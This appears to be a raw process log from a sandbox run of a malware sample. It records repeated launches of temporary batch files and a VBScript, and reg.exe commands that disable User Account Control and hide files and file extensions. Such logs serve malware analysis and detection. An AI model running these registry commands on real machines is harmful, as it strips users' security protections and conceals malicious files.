C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EqkwMEgU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ksEMookw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kuwIQIMM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jUQAssUU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DMAkAEwc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pycgkkYE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xqkcgUgw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KYoAkEQY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QiwwYUQw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eosYYowE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UgEcwAwU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LqQEIowc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pywccMsw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XwocgcIY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HQUoIQQo.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TYEIkwkc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wGQosEYY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cQgAUwMM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sQgEYEMM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UIQAkcwc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tcgMYcwM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fYcQMYkk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zqkgwQoE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yOUEEYgM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oCUggIIM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\asUUAIQY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MUIAwMUA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\REsMccoc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bSwQwMEI.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bgcwIAUg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
